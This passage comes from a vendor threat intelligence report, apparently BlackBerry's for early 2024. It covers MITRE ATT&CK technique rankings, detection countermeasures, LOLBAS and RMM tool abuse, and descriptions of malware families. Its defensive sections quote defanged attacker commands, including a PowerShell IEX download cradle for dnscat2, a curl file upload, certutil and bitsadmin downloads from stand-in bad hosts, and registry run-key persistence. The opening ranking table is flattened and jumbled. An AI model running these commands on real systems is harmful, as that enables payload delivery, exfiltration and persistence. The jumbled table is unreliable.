Persistence, Privilege Escalation
12
Disable or Modify Tools
T1562.001
Defense Evasion
18
Command and Scripting Interpreter
T1059
Execution
7
Obfuscated Files or Information
T1027
Defense Evasion
NA
Replication Through Removable Media
T1091
Initial Access, Lateral Movement
11
Technique ID
Process Injection
T1055
System Information Discovery
T1082
DLL Side-Loading
T1574.002
Input Capture
T1056
Security Software Discovery
T1518.001
Masquerading
T1036
File and Directory Discovery
T1083
Process Discovery
T1057
Application Layer Protocol
T1071
Registry Run Keys/Startup Folder
T1547.001
Non-Application Layer Protocol
T1095
Remote System Discovery
T1018
Application Window Discovery
T1010
Software Packing
T1027.002
Scheduled Task/Job
T1053
Windows Service
T1543.003
Disable or Modify Tools
T1562.001
Command and Scripting Interpreter
T1059
Obfuscated Files or Information
T1027
Replication Through Removable Media
T1091
Tactic Name
Process Injection
Privilege Escalation, Defense Evasion
System Information Discovery
Discovery
DLL Side-Loading
Persistence, Privilege Escalation, Defense Evasion
Input Capture
Credential Access, Collection
Security Software Discovery
Discovery
Masquerading
Defense Evasion
File and Directory Discovery
Discovery
Process Discovery
Discovery
Application Layer Protocol
Command-and-control
Registry Run Keys/Startup Folder
Persistence, Privilege Escalation
Non-Application Layer Protocol
Command-and-control
Remote System Discovery
Discovery
Application Window Discovery
Discovery
Software Packing
Defense Evasion
Scheduled Task/Job
Execution, Persistence, Privilege Escalation
Windows Service
Persistence, Privilege Escalation
Disable or Modify Tools
Defense Evasion
Command and Scripting Interpreter
Execution
Obfuscated Files or Information
Defense Evasion
Replication Through Removable Media
Initial Access, Lateral Movement
Last Report
Process Injection
1
System Information Discovery
3
DLL Side-Loading
4
Input Capture
2
Security Software Discovery
NA
Masquerading
10
File and Directory Discovery
13
Process Discovery
19
Application Layer Protocol
6
Registry Run Keys/Startup Folder
9
Non-Application Layer Protocol
5
Remote System Discovery
15
Application Window Discovery
NA
Software Packing
NA
Scheduled Task/Job
8
Windows Service
12
Disable or Modify Tools
18
Command and Scripting Interpreter
7
Obfuscated Files or Information
NA
Replication Through Removable Media
11
Change
Process Injection
=
System Information Discovery
DLL Side-Loading
Input Capture
Security Software Discovery
Masquerading
File and Directory Discovery
Process Discovery
Application Layer Protocol
Registry Run Keys/Startup Folder
Non-Application Layer Protocol
Remote System Discovery
Application Window Discovery
Software Packing
Scheduled Task/Job
Windows Service
Disable or Modify Tools
Command and Scripting Interpreter
Obfuscated Files or Information
Replication Through Removable Media

Using MITRE D3FEND™, the BlackBerry Threat Research and Intelligence team developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub.

The top three techniques are well-known procedures used by adversaries to gather key information to conduct successful attacks. The Applied Countermeasures section contains some examples of their usage and some useful information to monitor.

The impact of the total of techniques and tactics can be seen in the graph below:

Figure 13: Observed MITRE ATT&CK® Techniques.

The most prevalent Tactic this reporting period is Defense Evasion, making up 24 percent of the total of tactics observed during this reported period, followed by Discovery at 23 percent, and Privilege Escalation at 21 percent.
Figure 14: Observed MITRE ATT&CK Tactics.

Applied Countermeasures for Noted MITRE Techniques

The BlackBerry Research and Intelligence Team analyzed five noted MITRE Techniques observed this reporting period:

  • Security Software Discovery – T1518.001

    This popular technique allows cyberthreat actors to find the list of installed security programs, configurations and sensors on a targeted system or cloud environment. This is very important for an adversary who hopes to stay undetected. For example, if a malicious group runs one of the commands listed below on a compromised system and detects that the environment already has security to spot malicious activity, they will often abort the operation. In other cases, more advanced and persistent groups can differentiate between security applications and find a way to work around the weaker applications. This can result in an adversary gaining control of a system or cloud environment.

    Below are command lines that an attacker might use to evaluate your security:

    • netsh firewall show
    • netsh.exe interface dump
    • findstr /s /m /i "defender" *.*
    • Tasklist /v
    • Powershell Empire Module Get-AntiVirusProduct
    • cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

  • Masquerading – T1036

    This is a sophisticated cyberthreat tactic employed by attackers to disguise their activities and evade detection. For instance, by using a false name, icon and metadata, harmful actions can be easily disguised as standard system operations. Masquerading as a legitimate file or process can trick users and security software into opening or saving a fake file, which can lead to system penetration and data loss. (Find details on identifying a masquerading method in our CylanceMDR Observations section of this report.)

    Here is a breakdown of common masquerading methods:

    • Renaming Executables: Attackers often rename malicious executables to pretend they are a legitimate system program (e.g., svchost.exe, explorer.exe) and may change or add another fake extension to hide the real file type, such as .txt.doc or .exe.config. The goal is to trick users and security tools when running manual or automatic system checks, so the user will run or try to open the malicious file without heeding any system warnings.
    • Mimicking File Paths: In a commonly trusted directory (ex: System32), there is less observation and detection from security tools. For that reason, attackers often place malicious files in these directories and give them legitimate process names to conceal them.
    • Invalid Code Signature: Attackers may sign their malware with invalid or stolen digital certificates to bypass security measures. This misleads systems and users into trusting malicious files or processes by making them appear as if they are verified by a legitimate source. Attackers may use expired, revoked or fraudulently obtained certificates. Identifying such tactics requires robust certificate validation processes and alert systems that can flag unusual certificate data or failed validations. For example, to masquerade cmd.exe as a calculator app:
          Copy c:\windows\system32\cmd.exe C:\calc.exe

  • File and Directory Discovery – T1083

    File and Directory Discovery is frequently utilized during an attacker’s reconnaissance stage to gain insight into the target environment, identify potential files for exfiltration or manipulation, locate sensitive information or support further stages of an attack chain.

    The following are command lines used for this technique:

    • ‘dir /s C:\path\to\directory’ – Utilizes the dir utility to recursively list files and directories in a certain directory and its subdirectories.
    • ‘tree /F’ – Uses the tree utility to display file names in each directory along with the directory tree.
    • ‘powershell.exe -c "Get-ChildItem C:\path\to\directory"’ – Implements the Get-ChildItem cmdlet in powershell, which retrieves a list of files and directories in the specified path.

    Threat actors may also use native Windows API functions to enumerate files and directories. The following are Windows API functions used by threat actors:

    • FindFirstFile – Retrieves information about the first file or directory that matches the specified file name or directory name pattern.
    • FindNextFile – Continues a file search initiated by a previous call to the FindFirstFile function.
    • PathFileExists – Verifies whether a specified directory or file exists.

  • Application Layer Protocol – T1071

    Threat actors are constantly seeking new ways to conceal their actions within legitimate traffic to avoid detection. Application layer protocol manipulation (T1071) is a popular technique. During the first three months of 2024, this technique emerged as one of the top five tactics employed by malicious actors. By exploiting vulnerabilities in commonly used network protocols such as HTTP, HTTPS, DNS or SMB, adversaries can blend malicious activity seamlessly into routine network traffic.

    This technique can be used to exfiltrate data, enable C2 communication, and move laterally within compromised networks. For instance, adversaries may encode sensitive data within HTTP headers or leverage DNS tunneling to bypass network defenses and extract information without raising suspicion. The stealthy nature of application layer protocol manipulation poses significant challenges to detection and attribution, as many traditional security tools struggle to differentiate between normal and malicious network activity.

    Given the prevalence and sophistication of this technique, organizations must adopt proactive measures to bolster their defenses. A robust network monitoring solution must be capable of detecting anomalous traffic patterns and ensuring that suspicious behavior associated with application layer protocol manipulation is accurately differentiated from routine user activity.

    Furthermore, maintaining up-to-date security patches for network protocols and applications can mitigate known vulnerabilities and exploits. By implementing endpoint detection and response (EDR) solutions, organizations can enhance their ability to identify and respond to malicious activities perpetrated through application layer protocol manipulation, thereby bolstering their overall cybersecurity posture.

    The following are APL commands used by threat actors:        curl -F "file=@C:\Users\tester\Desktop\test[.]txt     127[.]0[.]0[.]1/file/upload
       powershell IEX (New-Object     System.Net.Webclient).DownloadString('hxxps://raw[.]git    hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1'

  • Registry Run Keys / Startup Folder – T1547.001

    Registry Run Keys / Startup Folder manipulation is a technique used by adversaries to establish persistence on compromised systems. This technique featured prominently among the top tactics utilized by cyberthreat actors in this reporting period. By tampering with Windows Registry keys or adding malicious entries to startup folders, adversaries ensure that their malicious payloads execute automatically upon system boot-up or user login, facilitating ongoing control over compromised systems.

    This technique enables adversaries to deploy a wide range of malware, including backdoors, keyloggers and ransomware, thereby maintaining persistent access to compromised systems. Adversaries exploit native functionalities of Windows to evade detection. The abuse of legitimate system configurations makes detection and mitigation of these threats more challenging for traditional AV solutions.

    To counter the threat posed by manipulation of registry run keys and startup folders, organizations must adopt a multi-layered approach to endpoint security:

    • Regularly monitor and audit Windows Registry keys and startup folders to detect unauthorized changes indicative of malicious activity.
    • Implement application whitelisting to help prevent unauthorized executables.
    • Set privilege management controls to restrict adversaries’ ability to manipulate critical system configurations.
    • Conduct user education and awareness programs to empower employees to recognize and report suspicious startup items or registry modifications.
    • Enhance overall threat detection and response capabilities.

    Some commands to be vigilant about include:

        REG ADD     "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d     "Test McTesterson"
        echo "" > "%APPDATA%\\Microsoft\\Windows\\Start     Menu\\Programs\\Startup\\file[.]txt"

CylanceMDR Data

This section of the report highlights several of the most common threat detections observed in CylanceMDR customer environments.

CylanceMDR, formerly known as CylanceGUARD®, is a subscription-based managed detection and response (MDR) service by BlackBerry that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats exploiting gaps in the customer’s security programs. The CylanceMDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry by region to provide additional insight into the current threat landscape.

Figure 15: Top five alerts by region.

CylanceMDR Observations

This reporting period, the CylanceMDR team observed that Certutil drove a lot of detection activity within the security operations center (SOC), namely, the technique related to renaming tools such as Certutil (e.g.: ‘Possible Certutil Renamed Execution’). There was a spike of detections related to this across all geographical regions where BlackBerry protects customers.

In our previous report, we discussed how living-off-the-land binaries and scripts (LOLBAS) utilities such as Certutil are abused or misused by threat actors: they often rename legitimate utilities (such as Certutil) in an attempt to evade detection capabilities. This is known as masquerading and has the MITRE Technique ID: T1036.003. Defenders must deploy robust detection capabilities to minimize the risk of evasion techniques such as masquerading. For example, creating a detection rule that only triggers when it sees the command Certutil (along with any options/arguments seen abused with this tool) can easily be evaded.

Take the two commands below, for example:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

If your detection capabilities only rely on seeing the command certutil (along with its options), this will be detected, but considered a weak protection as it could easily be evaded.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

In this case, we have renamed certutil.exe to outlook.exe and this would completely evade the detection (if using the logic discussed above).

A better solution would be to ensure that portable executable (PE) file/process metadata such as the original file name (the internal file name provided at compile time) is collected and integrated into the detection capabilities. A mismatch between the file name on disk and the binary’s PE metadata is a good indicator that a binary was renamed after compile time.

LOLBAS Activity

During this reporting period, we noted a change in the LOLBAS activity seen within our customer environments:

  • Increase in detections related to regsvr32.exe.
  • Decrease in mshta.exe-related activity.
  • A high increase in detections related to bitsadmin.exe.
Figure 16: LOLBAS detected by CylanceMDR.


Below illustrates an example of malicious LOLBAS usage (excluding those that were shared during the last reporting period).

File: Bitsadmin.exe
Mitre: T1197 | T1105
How it can be abused: 

  • Download/upload from or to malicious host (Ingress tool transfer)
  • Can be used to execute malicious process

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


File: mofcomp.exe
Mitre: T1218
How it can be abused: 

  • Can be used to install malicious managed object format (MOF) scripts
  • MOF statements are parsed by mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository

Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Remote monitoring and management (RMM) tools are frequently used by managed IT service providers (MSPs) to remotely monitor clients’ endpoints. Unfortunately, RMM tools also allow threat actors to access those same systems. These tools provide a slew of administration features and provide a way for the threat actor to blend in by using trusted and approved tools.

In 2023, RMM tool abuse was a focal point due to reports related to Scattered Spider, a cyberattack group thought to be behind the MGM Resorts International attacks in September 2023. Members of Scattered Spider are considered sophisticated social engineering experts and deploy various techniques such as SIM swap attacks, phishing and push bombing. They have used a range of RMM tools during their attacks such as:

  • Splashtop
  • TeamViewer
  • ScreenConnect

As of the first reporting period in 2024, the attention on RMM tooling has remained high since the discovery of two vulnerabilities in ConnectWise ScreenConnect (all versions below 23.9.8). CVE details can be seen below:

CVE-2024-1709

CWE-288: Authentication bypass using an alternate path or channel.

CVE-2024-1708

CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”).

The graph below illustrates the most common RMM tools observed during this reporting period.

Figure 17: RMM tools encountered by CylanceMDR.


During our analysis, we noted that many customers use multiple RMM tools, increasing the organization’s attack surface and risk. Suggested mitigations include:

Audit Remote Access Tools (RMM Tools)

  • Identify currently used RMM tools within the environment.
  • Confirm they are approved within the environment.
  • If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.

Disable Ports and Protocols

  • Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.

Routinely Audit Logs

  • Detect abnormal use of remote access tools.

Patching

  • Ensure regular review of vulnerabilities associated with RMM tools used, updating as necessary.
  • Internet accessible software such as RMM tools should always be a high priority when doing regular patch cycles. 

Network Segmentation

  • Minimize lateral movement by segmenting the network, limiting access to devices and data.

Device Tagging

  • Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure the SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.

Memory-Loading RMM

  • Use security software that can detect remote access that are only loaded in memory.

Conclusion

This 90-day report is designed to help you stay knowledgeable and prepared for future threats. When dealing with a rapidly shifting cybersecurity threat landscape, it’s helpful to stay current with the latest security news for your industry, geographic region and key issues. Here are our main takeaways for January through March 2024:

  • Globally, BlackBerry stopped 37,000 attacks per day directed at our tenants, according to our internal Attacks Stopped telemetry. We noted a large increase in unique malware targeting our tenants and customers, up 40 percent per minute over the previous reporting period. This could suggest that threat actors are taking extensive measures to carefully target their victims.
  • Infostealers were prominent in our Critical Infrastructure, Commercial Enterprise, and Top Threats sections. This suggests that sensitive and private data are highly sought by threat actors across all geographic regions and industries.
  • As highlighted in our new Ransomware Section that describes the most notable ransomware groups, ransomware is increasingly targeting critical infrastructure, particularly healthcare.
  • CVE exploitation has rapidly expanded in the last year and will continue. BlackBerry recorded nearly 9,000 new CVEs disclosed by NIST in the last three months. Additionally, over 56 percent of these disclosed vulnerabilities scored over 7.0 in criticality. Exploits related to heavily utilized legitimate software such as ConnectWise ScreenConnect, GoAnywhere and multiple genuine Ivanti products have been weaponized by threat actors at an alarming rate to deliver a whole host of malware to unpatched victim machines.
  • Political deceptions through deepfakes and misinformation are increasingly spreading via social media and will continue to be a problem in the future, particularly related to the Russian invasion of Ukraine, the unfolding Middle East conflict, and the upcoming U.S. presidential election taking place in November.

More information on the top cybersecurity threats and defenses can be found in the BlackBerry blog.

Acknowledgements

This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:

Appendix: Critical Infrastructure and Commercial Enterprise Threats

8Base ransomware: A particularly aggressive ransomware group first seen in 2023. It has been extremely active in its short history, often targeting victims in North America and LATAM countries. The threat group leverages a mix of tactics to achieve initial access, then may also exploit vulnerabilities in the victim’s systems to maximize their potential payout.

Amadey (Amadey Bot): Multifunctional botnet that has a modular design. Once it lands on a victim’s device, Amadey can receive commands from its C2 servers to execute various tasks, namely stealing information and deploying additional payloads.

Buhti: A relatively new ransomware operation, Buhti utilizes variants of the leaked LockBit 3.0 (a.k.a. LockBit Black) and Babuk ransomware families to attack Windows and Linux systems. In addition, Buhti has been known to use a custom data exfiltration utility written in the “Go” programming language designed to steal files with specific extensions. The ransomware operators have also already been seen swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and the recently patched PaperCut vulnerability (CVE-2023-27350).

LummaStealer (LummaC2): C-based infostealer that targets commercial enterprise and critical infrastructure organizations, focusing on exfiltrating private and sensitive data from the victim device. Often promoted and distributed via underground forums and Telegram groups, this infostealer often relies on Trojans and spam to propagate.

PrivateLoader: A notorious downloader family that has been in the wild since 2021, targeting primarily commercial enterprises in North America. PrivateLoader (as its name implies) is an initial access mechanism, facilitating the deployment of a plethora of malicious payloads onto victim devices, namely infostealers. PrivateLoader operates a distribution network via an underground pay-per-install (PPI) service to finance its continued usage and development.

RaccoonStealer: MaaS infostealer. In the wild since 2019, the makers of RaccoonStealer have enhanced its abilities to avoid security software and traditional AV software. According to BlackBerry’s internal telemetry, RaccoonStealer has been observed targeting commercial enterprises in North America.

RedLine (RedLine Stealer): A widely distributed malware infostealer often sold via MaaS. The main motive of the threat group that distributes the malware appears to be mainly financial gain rather than politics, destruction or espionage. This is why RedLine has actively targeted a range of industries and geographic regions.

Remcos (RemcosRAT): A commercial-grade RAT used to remotely control a computer or device. Though advertised as legitimate software, the remote control and surveillance software was often used as a remote access Trojan.

SmokeLoader: A commonly utilized malware with a plethora of capabilities, namely the deployment of other malware onto a victim’s device. SmokeLoader has been a recurring threat observed by BlackBerry through multiple Global Threat Intelligence Reports. This reporting period, the malware was seen targeting commercial and professional services within North America.

Vidar (VidarStealer): A commodity infostealer that has been in the wild since 2018 and has developed into a heavily weaponized malware family. Attackers have been able to deploy Vidar by exploiting vulnerabilities in the popular ScreenConnect RRM software by ConnectWise. These two CVEs, CVE-2024-1708 and CVE-2024-1709, enabled threat actors to bypass and access critical systems.

Legal Disclaimer

The information contained in the BlackBerry Global Threat Intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.